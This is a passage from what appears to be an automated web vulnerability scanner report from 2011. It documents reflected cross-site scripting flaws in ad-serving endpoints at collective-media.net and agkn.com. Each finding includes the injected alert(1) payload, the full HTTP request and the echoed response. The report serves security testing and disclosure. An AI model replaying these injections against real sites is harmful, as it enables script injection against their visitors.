Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca413'-alert(1)-'23a95e8eafa was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer/be_home;sz=ca413'-alert(1)-'23a95e8eafa HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7347
Date: Sat, 17 Sep 2011 16:48:05 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='121773f9380f32f';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
ollectiveMedia.createAndAttachAd("q1-30517831260_1316278085","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/be_home;net=q1;u=,q1-30517831260_1316278085,121773f9380f32f,none,;;cmw=nurl;sz=ca413'-alert(1)-'23a95e8eafa;contx=none;dc=s;btg=?","ca413'-alert(1)-'23a95e8eafa","",true);</scr'+'ipt>
...[SNIP]...
4.25. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/home

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload baef0'-alert(1)-'39cff7264f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjbaef0'-alert(1)-'39cff7264f0/q1.q.seattlepostintelligencer/home;sz=728x90;net=q1;ord=3639010052;ord1=105623;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7332
Date: Sat, 17 Sep 2011 16:49:32 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30219105289_1316278172","http://ad.doubleclick.net/adjbaef0'-alert(1)-'39cff7264f0/q1.q.seattlepostintelligencer/home;net=q1;u=,q1-30219105289_1316278172,,polit,;;cmw=owl;sz=728x90;net=q1;ord1=105623;contx=polit;dc=s;btg=;ord=3639010052?","728","90",true);</scr'+'ipt>
...[SNIP]...
4.26. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76532'-alert(1)-'8e8c22c30a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer76532'-alert(1)-'8e8c22c30a1/home;sz=728x90;net=q1;ord=3639010052;ord1=105623;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7332
Date: Sat, 17 Sep 2011 16:49:32 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30202844826_1316278172","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer76532'-alert(1)-'8e8c22c30a1/home;net=q1;u=,q1-30202844826_1316278172,,polit,;;cmw=owl;sz=728x90;net=q1;ord1=105623;contx=polit;dc=s;btg=;ord=3639010052?","728","90",true);</scr'+'ipt>
...[SNIP]...
4.27. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b257'-alert(1)-'8e4facbf4cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer/home7b257'-alert(1)-'8e4facbf4cf;sz=728x90;net=q1;ord=3639010052;ord1=105623;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7332
Date: Sat, 17 Sep 2011 16:49:33 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30301510334_1316278173","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/home7b257'-alert(1)-'8e4facbf4cf;net=q1;u=,q1-30301510334_1316278173,,polit,;;cmw=owl;sz=728x90;net=q1;ord1=105623;contx=polit;dc=s;btg=;ord=3639010052?","728","90",true);</scr'+'ipt>
...[SNIP]...
4.28. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f849'-alert(1)-'1da09993cbd was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer/home;sz=5f849'-alert(1)-'1da09993cbd HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7314
Date: Sat, 17 Sep 2011 16:49:27 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
age="Javascript">CollectiveMedia.createAndAttachAd("q1-30313547426_1316278167","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/home;net=q1;u=,q1-30313547426_1316278167,,none,;;cmw=nurl;sz=5f849'-alert(1)-'1da09993cbd;contx=none;dc=s;btg=?","5f849'-alert(1)-'1da09993cbd","",true);</scr'+'ipt>
...[SNIP]...
4.29. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54ba1'-alert(1)-'e8903b7b342 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj54ba1'-alert(1)-'e8903b7b342/q1.q.seattlepostintelligencer/qo;sz=300x250;net=q1;ord=[timestamp];ord1=841037;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7363
Date: Sat, 17 Sep 2011 16:23:43 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30509901420_1316276623","http://ad.doubleclick.net/adj54ba1'-alert(1)-'e8903b7b342/q1.q.seattlepostintelligencer/qo;net=q1;u=,q1-30509901420_1316276623,1229bf517f8af24,polit,;;cmw=owl;sz=300x250;net=q1;ord1=841037;contx=polit;dc=s;btg=;ord=[timestamp]?","300","250",true);</scr'+'ipt
...[SNIP]...
4.30. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 400ca'-alert(1)-'bb299063a32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer400ca'-alert(1)-'bb299063a32/qo;sz=300x250;net=q1;ord=[timestamp];ord1=841037;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7363
Date: Sat, 17 Sep 2011 16:23:45 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30217030312_1316276625","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer400ca'-alert(1)-'bb299063a32/qo;net=q1;u=,q1-30217030312_1316276625,1229bf517f8af24,polit,;;cmw=owl;sz=300x250;net=q1;ord1=841037;contx=polit;dc=s;btg=;ord=[timestamp]?","300","250",true);</scr'+'ipt>
...[SNIP]...
4.31. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6da30'-alert(1)-'f578bbc5ef0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer/qo6da30'-alert(1)-'f578bbc5ef0;sz=300x250;net=q1;ord=[timestamp];ord1=841037;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7363
Date: Sat, 17 Sep 2011 16:23:45 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30405826374_1316276625","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/qo6da30'-alert(1)-'f578bbc5ef0;net=q1;u=,q1-30405826374_1316276625,1229bf517f8af24,polit,;;cmw=owl;sz=300x250;net=q1;ord1=841037;contx=polit;dc=s;btg=;ord=[timestamp]?","300","250",true);</scr'+'ipt>
...[SNIP]...
4.32. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91f0f'-alert(1)-'443691ddcbd was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer/qo;sz=91f0f'-alert(1)-'443691ddcbd HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7342
Date: Sat, 17 Sep 2011 16:23:40 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
pt">CollectiveMedia.createAndAttachAd("q1-30108446215_1316276620","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/qo;net=q1;u=,q1-30108446215_1316276620,1229bf517f8af24,none,;;cmw=nurl;sz=91f0f'-alert(1)-'443691ddcbd;contx=none;dc=s;btg=?","91f0f'-alert(1)-'443691ddcbd","",true);</scr'+'ipt>
...[SNIP]...
4.33. http://ad.agkn.com/iframe!t=1089! [clk1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1089!

Issue detail

The value of the clk1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2898"%3balert(1)//fa66136d678 was submitted in the clk1 parameter. This input was echoed as e2898";alert(1)//fa66136d678 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3807892&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/34/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dother%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3Brsi%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3fe2898"%3balert(1)//fa66136d678 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=184471637933354914; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:48 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIWB4rEAAAAAGwBArgBASUYDSgBUAANKQFgAA0qASAADSsBUAANLAFQAA0tATAADS4BUAANLwFwAA0lAUAADSYBQAANJwFAAA05AWAADTgBcAANOwGAAA06AUAADTwBMAANMQEwAA0wARAADTMBYAANMgFAAA01ARAADTQBQAANNwFwAA02AVAABQEgAQCAASEBAIABJgEAgAEfAQCAAR4BAIABArh%2BNmC3IYoKl9sAAAAAAAADCQAAAAAAAA03AAAAAAAAASUCSgAA; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Mon, 16-Sep-2013 16:43:48 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
4359;;~aopt=0/ff/34/ff;~fdr=244754359;0-0;0;18485482;3454-728/90;43698008/43715795/1;;~okv=;site=answerology;cat=other;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;rsi=;~aopt=2/0/34/0;~sscs=?e2898";alert(1)//fa66136d678http://ad.agkn.com/interaction!che=253133449?imid=3918333030490085339&ipid=777&caid=696&cgid=293&crid=3383&a=CLICK&adid=586&status=0&l=http://www.pantene.com/en-US/hair-care-collections/restore-beautif
...[SNIP]...
4.34. http://ad.agkn.com/iframe!t=1089! [clk1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1089!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99ad9"><script>alert(1)</script>435adb126ae was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3807892&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/34/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dother%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3Brsi%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f99ad9"><script>alert(1)</script>435adb126ae HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=184471637933354914; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:47 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIWB4rDAAAAAGoBArgBASUYDSgBUAANKQFgAA0qASAADSsBUAANLAFAAA0tATAADS4BUAANLwFwAA0lAUAADSYBQAANJwFAAA05AWAADTgBcAANOwGAAA06AUAADTwBMAANMQEwAA0wARAADTMBYAANMgFAAA01ARAADTQBQAANNwFgAA02AVAABQEgAQCAASEBAIABJgEAgAEfAQCAAR4BAIABArh%2BIc9vMfB8Iq8AAAAAAAADCQAAAAAAAA08AAAAAAAAASUCSgAA; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Mon, 16-Sep-2013 16:43:47 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
4359;;~aopt=0/ff/34/ff;~fdr=244754359;0-0;0;18485482;3454-728/90;43698008/43715795/1;;~okv=;site=answerology;cat=other;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;rsi=;~aopt=2/0/34/0;~sscs=?99ad9"><script>alert(1)</script>435adb126aehttp://ad.agkn.com/interaction!che=472696441?imid=2436288183709475503&ipid=777&caid=696&cgid=293&crid=3388&a=CLICK&adid=586&status=0&l=http://www.pantene.com/en-US/hair-care-collections/restore-beautif
...[SNIP]...
4.35. http://ad.agkn.com/iframe!t=1089! [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1089!

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66d9b"><script>alert(1)</script>33d30fc9f77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

